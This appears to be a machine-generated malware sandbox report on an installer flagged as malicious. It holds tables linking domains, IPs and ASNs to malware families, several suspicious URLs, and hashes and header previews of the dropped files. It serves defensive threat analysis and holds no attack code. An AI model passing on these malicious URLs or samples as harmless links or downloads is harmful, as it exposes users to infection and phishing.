	boost.exe	Get hash	malicious	NovaSentinel	Browse
	Mauqes.exe	Get hash	malicious	NovaSentinel	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
oshi.at	Setup 3.0.0.msi	Get hash	malicious	Unknown	Browse	188.241.120.6
	SecuriteInfo.com.Win64.Evo-gen.30371.21664.exe	Get hash	malicious	Akira Stealer	Browse	188.241.120.6
	SecuriteInfo.com.Win64.Evo-gen.30371.21664.exe	Get hash	malicious	Unknown	Browse	188.241.120.6
	uVQLD8YVk6.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse	194.15.112.248
	W73PCbSH71.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse	194.15.112.248
	9K25QyJ4hA.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	9K25QyJ4hA.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	PAYMENT_RECEIPT_STAN100699.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	PAYMENT_RECEIPT_STAN100699.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	VGuSHbkIxk.exe	Get hash	malicious	Amadey, Djvu, Fabookie, RedLine, SmokeLoader	Browse	5.253.86.15
discord.com	http://discord-proxy.tassadar2002.workers.dev/	Get hash	malicious	Unknown	Browse	162.159.138.232
	http://dapi.190823.xyz/	Get hash	malicious	Unknown	Browse	162.159.138.232
	http://via.evove.top	Get hash	malicious	Unknown	Browse	162.159.136.232
	LisectAVT_2403002A_147.exe	Get hash	malicious	Blank Grabber	Browse	162.159.138.232
	LisectAVT_2403002A_210.exe	Get hash	malicious	Python Stealer, Empyrean, Discord Token Stealer	Browse	162.159.128.233
	LisectAVT_2403002A_368.exe	Get hash	malicious	Blank Grabber, DCRat, Umbral Stealer	Browse	162.159.138.232
	LisectAVT_2403002A_51.exe	Get hash	malicious	Stealerium	Browse	162.159.128.233
	Setup 3.0.0.msi	Get hash	malicious	Unknown	Browse	162.159.138.232
	LisectAVT_2403002B_444.exe	Get hash	malicious	Discord Token Stealer, NitroRansomware	Browse	162.159.128.233
	DD Spotify Acc Gen.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.138.232
file.io	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	31.14.70.245
	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	31.14.70.245
	Setup 3.0.0.msi	Get hash	malicious	Unknown	Browse	51.91.7.6
	LisectAVT_2403002A_392.exe	Get hash	malicious	NovaSentinel	Browse	45.112.123.126
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	231210-10-Creal-33652f.exe	Get hash	malicious	Creal Stealer	Browse	51.91.7.6
	https://UMBF.sharefile.com/d/f366c76377744bc3	Get hash	malicious	Unknown	Browse	13.224.189.115
	Dead By Daylight.exe	Get hash	malicious	NovaSentinel	Browse	51.178.66.33
chrome.cloudflare-dns.com	TamenuV5.2.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	TamenuV5.2.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	@Imperva.xml	Get hash	malicious	Coinhive, Xmrig	Browse	162.159.61.3
	setup.exe	Get hash	malicious	MicroClip	Browse	172.64.41.3
	setup.exe	Get hash	malicious	MicroClip	Browse	162.159.61.3
	file.exe	Get hash	malicious	Babadeda	Browse	162.159.61.3
	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	Modrinth_Installer.exe	Get hash	malicious	XWorm	Browse	162.159.61.3
	Modrinth_Installer.exe	Get hash	malicious	XWorm	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	162.159.61.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	TamenuV5.2.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Wine.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	TamenuV5.2.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://tinyurl.com/3kx85rdt	Get hash	malicious	Unknown	Browse	188.114.96.3
	Payment Advice-DPEB08-2SDC - SS25 Price C246SH32.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	188.114.97.3
	@Imperva.xml	Get hash	malicious	Coinhive, Xmrig	Browse	172.64.41.3
	T7J24OBDyt.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	wkoYf92Fyp.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.InjectNET.17.32646.13700.exe	Get hash	malicious	LummaC, Xmrig	Browse	104.21.11.139
BELCLOUDBG	https://littlepancakeswap.com/	Get hash	malicious	Unknown	Browse	185.203.118.246
	https://www.littlepancakeswap.com/	Get hash	malicious	Unknown	Browse	185.203.118.246
	gjKFijNP5I.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.156.144.79
	p0DSCR991t.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.156.144.79
	xqEPYdfyC8.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.156.144.79
	36PbKsKext.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.156.144.79
	Cdi2VB56V3.elf	Get hash	malicious	Mirai, Gafgyt	Browse	94.156.144.79
	6LoSg06Yb5.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.156.144.79
	roPbpTTXqM.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.156.144.79
	YIHfMPPeSC.elf	Get hash	malicious	Unknown	Browse	185.140.209.22
CLOUDFLARENETUS	TamenuV5.2.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Wine.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	TamenuV5.2.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://tinyurl.com/3kx85rdt	Get hash	malicious	Unknown	Browse	188.114.96.3
	Payment Advice-DPEB08-2SDC - SS25 Price C246SH32.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	188.114.97.3
	@Imperva.xml	Get hash	malicious	Coinhive, Xmrig	Browse	172.64.41.3
	T7J24OBDyt.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	wkoYf92Fyp.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.InjectNET.17.32646.13700.exe	Get hash	malicious	LummaC, Xmrig	Browse	104.21.11.139
OVHFR	SecuriteInfo.com.FileRepMalware.25250.22977.exe	Get hash	malicious	Xmrig	Browse	51.77.140.74
	205.185.120.123-skid.arm7-2024-07-27T10_33_43.elf	Get hash	malicious	Mirai, Moobot	Browse	54.39.196.193
	8SxJ9aYfJ1.exe	Get hash	malicious	FormBook	Browse	51.89.93.192
	file.exe	Get hash	malicious	SmokeLoader	Browse	51.77.140.74
	https://riprogramma.consegna.52-47-206-73.cprapid.com/brt/payment.php	Get hash	malicious	Unknown	Browse	217.182.178.233
	hfi47s4wOT.exe	Get hash	malicious	Unknown	Browse	51.77.140.74
	file.exe	Get hash	malicious	SmokeLoader	Browse	51.77.140.74
	new.bat	Get hash	malicious	Unknown	Browse	51.89.199.99
	Aurora.exe	Get hash	malicious	Aurora, Quasar, RedLine, Xmrig	Browse	51.79.71.77
	https://new-sneww-online-nowz-all.azurewebsites.net/?referrer=appmetrica_tracking_id%3D173005530304969909%26ym_tracking_id%3D10094745761516744100	Get hash	malicious	Unknown	Browse	54.36.150.186

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Setup 3.0.0.msi	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Programs\Setup\d3dcompiler_47.dll	TamenuV5.2.exe	Get hash	malicious	Unknown	Browse
	TamenuV5.2.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002A_375.exe	Get hash	malicious	Unknown	Browse
	Setup 3.0.0.msi	Get hash	malicious	Unknown	Browse
	KolataFixed.exe	Get hash	malicious	Unknown	Browse
	KolataFixed.exe	Get hash	malicious	Unknown	Browse
	Lisect_AVT_24003_G1B_24.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002A_392.exe	Get hash	malicious	NovaSentinel	Browse
	7Y18r(69).exe	Get hash	malicious	Unknown	Browse
	7Y18r(69).exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\48ea53.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	22538
Entropy (8bit):	5.812584874539331
Encrypted:	false
SSDEEP:	384:LY552KTeiIkSrVpC+Zc1M+HVGXq7NKVvDBsRPjhWwU5HNcvRhWAGiQtIOkayqXZY:La52KTeiIkSrVpC+Zc1JHVGXq7NKVvDa
MD5:	0CC723BE6E2981D0C140C6BBBD41C068
SHA1:	80CFC2D41B1C6D5491C3F1BC3075FC85F4A638BB
SHA-256:	B3089E266447139C15F8952A83B1CA80764E1F201615AFC5197CD4B270E8A20F
SHA-512:	A6EE8CA0D3804D3CF22ABB8801283A22BE01E423CBE4D12DFF28B958CC530583E0C533169C6B89963C81D57EB562587E355CAE1B78A3506D4EBD1C5B7F6693EF
Malicious:	false
Preview:	...@IXOS.@.....@HB.X.@.....@.....@.....@.....@.....@......&.{8C7A072A-3005-48F5-AE5F-6D02D608DF59}..Setup..TamenuV11.msi.@.....@.....@.....@......SetupIcon.exe..&.{AE886136-226A-468E-98F9-6C40EB8B03A3}.....@.....@.....@.....@.......@.....@.....@.......@......Setup......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{6534B6CF-7B99-59A0-8481-3A9A915491B7}&.{8C7A072A-3005-48F5-AE5F-6D02D608DF59}.@......&.{D3019177-A881-5C50-A05E-B6C771301850}&.{8C7A072A-3005-48F5-AE5F-6D02D608DF59}.@......&.{DB9B5920-54F6-5361-A7D1-76FB76EF066E}&.{8C7A072A-3005-48F5-AE5F-6D02D608DF59}.@......&.{28009B83-8EE6-5693-B33E-21509BAB6AE8}&.{8C7A072A-3005-48F5-AE5F-6D02D608DF59}.@......&.{4DD5777F-4EDC-541C-890F-A4564FCEB28F}&.{8C7A072A-3005-48F5-AE5F-6D02D608DF59}.@......&.{D581C9B9-8306-5EFD-B49C-3F14B5B6485D}&.{8C7A072A-3005-48F5-AE5F-6D02D608DF59}.@......&.{D8F8BC3A-ED29-53E2-BBEF-886260F1138A}&.{8C7A072A-3005-48F

C:\Users\user\AppData\Local\Programs\Setup\LICENSE.electron.txt

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1096
Entropy (8bit):	5.13006727705212
Encrypted:	false
SSDEEP:	24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
MD5:	4D42118D35941E0F664DDDBD83F633C5
SHA1:	2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
SHA-256:	5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
SHA-512:	3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
Malicious:	false
Preview:	Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN

C:\Users\user\AppData\Local\Programs\Setup\LICENSES.chromium.html

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	9227221
Entropy (8bit):	4.785730097444693
Encrypted:	false
SSDEEP:	24576:cpD6826x5kSWSsRinoHnmfm646a6N6z68SH4SApTJ:cHSek
MD5:	2675B30D524B6C79B6CEE41AF86FC619
SHA1:	407716C1BB83C211BCB51EFBBCB6BF2EF1664E5B
SHA-256:	6A717038F81271F62318212F00B1A2173B9CB0CC435F984710AC8355EB409081
SHA-512:	3214341DA8BF3347A6874535BB0FF8D059EE604E779491780F2B29172F9963E23ACBE3C534D888F7A3B99274F46D0628962E1E72A5D3FC6F18CA2B62343DF485
Malicious:	false
Preview:	Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title">Credits</span>.<a id="print-link" href="#" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may use, copy, modify this code for any purpose

C:\Users\user\AppData\Local\Programs\Setup\Setup.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	172671488
Entropy (8bit):	6.736647675790755
Encrypted:	false
SSDEEP:	1572864:O3lB0RhDP7igv6wO+HkaN/xtpj56BZWua2T3jC0gqhd07YeRt6C1Bd1jKoUeKtQk:rPvt1x2z5m1ij
MD5:	2B413D49C423BB99F05F8379154732CE
SHA1:	D9C1FF5D2DC3524AE703D34EAC9BAD08563EB645
SHA-256:	44658DFE810B7ED62417582A94781510E4B32E74A1B00D63941B390C0CCAA5A1
SHA-512:	4CE29ABCD81E1FC57978D620C8FF64B019191B5E0545CD5CEE358A9A7B03C3BE943CA7373E4D836882AC9DEF95F9BCFCB2A8586555C66EBBBCBA2CFFB429BF15
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: Setup 3.0.0.msi, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........."......0o..f......p.j........@..........................................`.............................................9D......T....pw......`2.0.D...........y..x...k.......................e..(....]o.@...........h...X...hr..`....................text...e/o......0o................. ..`.rdata..x.}..@o...~..4o.............@..@.data.....E..@.......4..............@....pdata..0.D..`2.. D..,..............@..@.00cfg..0.....v......L:.............@..@.gxfg... C....v..D...N:.............@..@.retplne......v.......:..................rodata.......v.......:............. ..`.tls..........w.......:.............@...CPADinfo8.... w.......:.............@...LZMADEC......0w.......:............. ..`_RDATA..\....Pw.......:.............@..@malloc_h.....`w.......:............. ..`.rsrc........pw.......:.............@..@.reloc...x....y..z...H<.............@..B................

C:\Users\user\AppData\Local\Programs\Setup\chrome_100_percent.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	135642
Entropy (8bit):	7.916363227461705
Encrypted:	false
SSDEEP:	3072:tezwJCGIekwf9W2bg3yhPaL2o418Gb0+VRLf0ld0GY3cQ3ERVm2I:tezw1Iek+42k3yMK18Gb0OV8ld0GecQJ
MD5:	A0E681FDD4613E0FFF6FB8BF33A00EF1
SHA1:	6789BACFE0B244AB6872BD3ACC1E92030276011E
SHA-256:	86F6B8FFA8788603A433D425A4BC3C4031E5D394762FD53257B0D4B1CFB2FFA2
SHA-512:	6F6A1A8BFE3D33F3FA5F6134DAC7CD8C017E38E5E2A75A93A958ADDBB17A601C5707D99A2AF67E52C0A3D5206142209703701CD3FAB44E0323A4553CAEE86196
Malicious:	false
Preview:	....................5...........r..........._.......................P.....J.................c!.....#....#......8.....;.....@....PC.....E.....G....8J....(L....XN.....R.....U..!..Y.."..Z..$..[..&..]..'..^....]_../.we..0..k..1./m..2..m.....n.....o.....q.....t....xw.....z.....~..........,...........................w.........0....{....@....C....y....v.......................................u"...K)....+.../...t3....=...!@...xH...]L....U...5`....pd.....f.....n....Lw....4x.....y.....{.....~....W.....l...........'...........b.......................`............................p................r.....w...0.\|...1.<...2.....3.....4.$...5.....6....7.....8.....9.s...:....;....<.....=.r...>.`...?.x...@.~...A.8...C.....D.....E.....F.W...G.!...H.....I.....J.....K.....L.....O.....&.....'.....(.5...)......*...+.T...,.!...-.k........./.....0.Y...1.....2.....3.....4.....5.....6.!...7.....8.7...9.....:.P...<.....=.-...>.....?.....@.Y...A.....B.{...C.....D.-...E.....F...

C:\Users\user\AppData\Local\Programs\Setup\chrome_200_percent.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	195396
Entropy (8bit):	7.94178165609805
Encrypted:	false
SSDEEP:	3072:ADQYaE/N6Mrvy/3JP29W2bg3yhPaafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+y:ADQYaSN6svyd242k3yxgx5GMRejnbdZR
MD5:	C37BD7A6B677A37313B7ECC4FF01B6F5
SHA1:	79DB970C44347BD3566CEFB6CABD1995E8E173DF
SHA-256:	8C1AE81D19FD6323A02EB460E075E2F25ABA322BC7D46F2E6EDB1C4600E6537A
SHA-512:	A7B07133FA05593B102A0E5E5788B29488CB74656C5EE25DE897C2BA2B2A7B05C0663ADE74A003F7D6DF2134D0B75F0AD25E15E9C9E0969E9453B7FC40B9F8BB
Malicious:	false
Preview:	....................<..........................................$.....).....,....N4.....8.....@.....D....;Y.....m.....s....y}.........e...........W...........>.....b.....k...!.%...".}...$.....&.....'........../.#...0.....1.(...2.......$...........9.....-.....2.....q...........d...................................m.........&F...qP...6S....W....a....c...ff....k....v...sx..................~....`................F....r............r.....................s........................................E.................W.............................. ....5#....2....P-....i4.....<....[?.....f.....g....bl..0.Eq..1.sr..2..t..3..u..4.lv..5..w..6.ry..7..z..8.v\|..9..~..:.....;.I...<.7...=.....>.....?.....@.....A....C.....D.....E....F.....G.9...H.Z...I.N...J."...K....L.....O.D...&.>...'.....(.....).[........+.<...,.....-.k........./.)...0.}...1.....2.....3.....4.r...5.....6.....7.$...8.....9.U...:.....<.....=.....>.....?.P...@.....A.k...B.,...C.....D.*...E.....F.$.

C:\Users\user\AppData\Local\Programs\Setup\d3dcompiler_47.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4916712
Entropy (8bit):	6.398049523846958
Encrypted:	false
SSDEEP:	49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
MD5:	2191E768CC2E19009DAD20DC999135A3
SHA1:	F49A46BA0E954E657AAED1C9019A53D194272B6A
SHA-256:	7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
SHA-512:	5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: TamenuV5.2.exe, Detection: malicious, Browse Filename: TamenuV5.2.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_375.exe, Detection: malicious, Browse Filename: Setup 3.0.0.msi, Detection: malicious, Browse Filename: KolataFixed.exe, Detection: malicious, Browse Filename: KolataFixed.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1B_24.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_392.exe, Detection: malicious, Browse Filename: 7Y18r(69).exe, Detection: malicious, Browse Filename: 7Y18r(69).exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...^.}`.........." ......8..........<).......................................K.....:FK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Programs\Setup\ffmpeg.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2887680
Entropy (8bit):	6.7090688959107
Encrypted:	false
SSDEEP:	49152:9F5qb84KtStWEK/Ju2lf3tAtiLHQVTf6yfcrhCHDXLl8+0LKSQUSCu:9FvSkJXv+tiLAD0+DUS5
MD5:	208E7AF956A0803900125BDC11A3ECF2
SHA1:	1BD84174194485DA634BF8B3AF0A78E236316A8E
SHA-256:	D863C8A26744703F2D12C674B45C87D8B34E21EFCE169D4797B57964D168B077
SHA-512:	76937999A21391107D9EBCFD66C7A2CA967CC7CAC7AEB2B15BBECA6B546423A3D5C83969EF151C95D916D5A9F653573CD59D05110566D52A5C2679059C4D4EC3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........." ......#.........p........................................PB...........`A........................................x)....../.(.............@...............B..4....).......................).(....B#.@............3.P............................text...5.#.......#................. ..`.rdata..$....0#.......#.............@..@.data...........".................@....pdata........@....................@..@.00cfg..8.....A.......+.............@..@.gxfg... -....A.......+.............@..@.retplne......A.......+..................tls..........A.......+.............@..._RDATA..\.....B.......+.............@..@.reloc...4....B..4....+.............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Programs\Setup\icudtl.dat

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	10717392
Entropy (8bit):	6.282534560973548
Encrypted:	false
SSDEEP:	196608:hpgPBhORiuQwCliXUxbblHa93Whli6Z86WOH:n8wkDliXUxbblHa93Whli6Z8I
MD5:	E0F1AD85C0933ECCE2E003A2C59AE726
SHA1:	A8539FC5A233558EDFA264A34F7AF6187C3F0D4F
SHA-256:	F5170AA2B388D23BEBF98784DD488A9BCB741470384A6A9A8D7A2638D768DEFB
SHA-512:	714ED5AE44DFA4812081B8DE42401197C235A4FA05206597F4C7B4170DD37E8360CC75D176399B735C9AEC200F5B7D5C81C07B9AB58CBCA8DC08861C6814FB28
Malicious:	false
Preview:	...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html ......E.......E.......E..P/...E.../...E..P7...E...7...E...h...F...h.. F..Pi..0F......DF.....WF.....jF..P...}F.......F..`....F.......F.. ....F.......F..0....F.......G......G......(G.....;G..@...NG......aG.....tG.......G.......G..@....G.......G.......G.......G..P....G.......H.......H..P...2H......EH..`...UH......hH......yH..P....H.......H.......H..`....H.......H.......H..P....I.......I......-I..@...=I......PI......aI..@...uI.......I...0...I.. 1...I..p1...I...e...I...e...I...i...I..`i...J...i..)J...K..BJ..p...^J..."'.uJ..P.'..J....'..J...5'..J..06'..J...>'..J..P?'..K...D'..K...F'.0K...H'.IK...V'.hK....(..K....(..K..P.)..K....)..K..pW..K..P...L...*+.?L..p.+.bL....+..L...U,..L....,..L....,..L....,..L..@.,..M....,.-M..P.-.IM.. e-.`M...e-.~M...R/..M.../..M..0.0..M..@.0..M..P.0..M....0..N....0.!N...,0.9N...,0.NN..0-0.fN...-0.vN...Y0..N...Z0..N..

C:\Users\user\AppData\Local\Programs\Setup\libEGL.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	488960
Entropy (8bit):	6.346910910503449
Encrypted:	false
SSDEEP:	6144:38hd1BSjuMmof2SEXVVfgV8hxN7h2NwIEOg51f0FticyQ:38DXSjZmof2SEsmN12NwIE7f0FticyQ
MD5:	1B74F7E2B5D44AC10A89A5CF206630A8
SHA1:	DD2E816E315B6A6A271FB01DC12163D9936C77C4
SHA-256:	662746A02930C151C5CAB2B1167A56C6CA78B44028448FDA91182147856EDFED
SHA-512:	246814E5FC157CF731E3EC3E1096922864B48A36CC5B1E5259EBD2E673FDE5DC741AD600F69CD80E1544EE12438F7CC6F208ADD894B5E02AC5E2C87D0B3933A8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........." .....6...:......@........................................ ............`A.........................................E..h....S..(.......x....@..(D..............T....=.......................<..(...@Q..@........... W...............................text....5.......6.................. ..`.rdata......P.......:..............@..@.data....K....... ..................@....pdata..(D...@...F..................@..@.00cfg..8............2..............@..@.gxfg...0&.......(...4..............@..@.retplne.............\...................tls....!............^..............@..._RDATA..\............`..............@..@.rsrc...x............b..............@..@.reloc..T............h..............@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Programs\Setup\libGLESv2.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	7617024
Entropy (8bit):	6.483264228465234
Encrypted:	false
SSDEEP:	98304:AwY1sQqaLe2Egto8U4r5Pp6TlITQZ38W888888888tb8dii:vNaSgtvroZ8
MD5:	596379BA25B32E95B5EC3CD8028B291B
SHA1:	AF61B5D29DB91997E29FFED8A410D09CE74EE51E
SHA-256:	D5E1D7B8531A0F4AB576BA6F78D4C63B39186A2830D313C6695F0024C9EF627A
SHA-512:	F8835B455820C77B4BA509C326A185BF65131242161498229C5E3584A0E7789324932B95678556A657440DEAF067EAD454E85BF8233EFA24162E7E4D9EAF417B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........." ......X..B.......CL......................................@u...........`A..........................................k......\|l.d....Pt.......q..[...........`t......:k.....................`9k.(.....Y.@.............l..... .k.@....................text.....X.......X................. ..`.rdata...T....Y..V....X.............@..@.data...t....pm......Lm.............@....pdata...[....q..\....p.............@..@.00cfg..8.....s......,s.............@..@.gxfg....,....s.......s.............@..@.retplne..... t......\s..................tls....B....0t......^s.............@..._RDATA..\....@t......`s.............@..@.rsrc........Pt......bs.............@..@.reloc.......`t......hs.............@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Programs\Setup\locales\af.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	457927
Entropy (8bit):	5.4171857958645475
Encrypted:	false
SSDEEP:	12288:/cqYYWk0o+wZiSMKVQ2uM2Z12JynA7PIrfsdgSTCSQ2fs37KQOb5t/tn6A/HiaHU:ynk0ofMSMaTuM2Z12JynA7PIrfsdgST4
MD5:	917A688D64ECCF67FEF5A5EB0908B6D4
SHA1:	7206B01BBC3FD8CC937DB9050DD8AC86CF44D8CC
SHA-256:	6981249837AD767FC030EDC8838878A5E493FB08CC49982CFFAED16CFBEB564D
SHA-512:	195DBEC8463CF89990232296C5C927E1501F0C2E01A7BE7C6A6ACAE651853CE1EDB23D639AF65979B39A3C61979119C3A305ACFA3AADF0CB93E241C5E57F4534
Malicious:	false
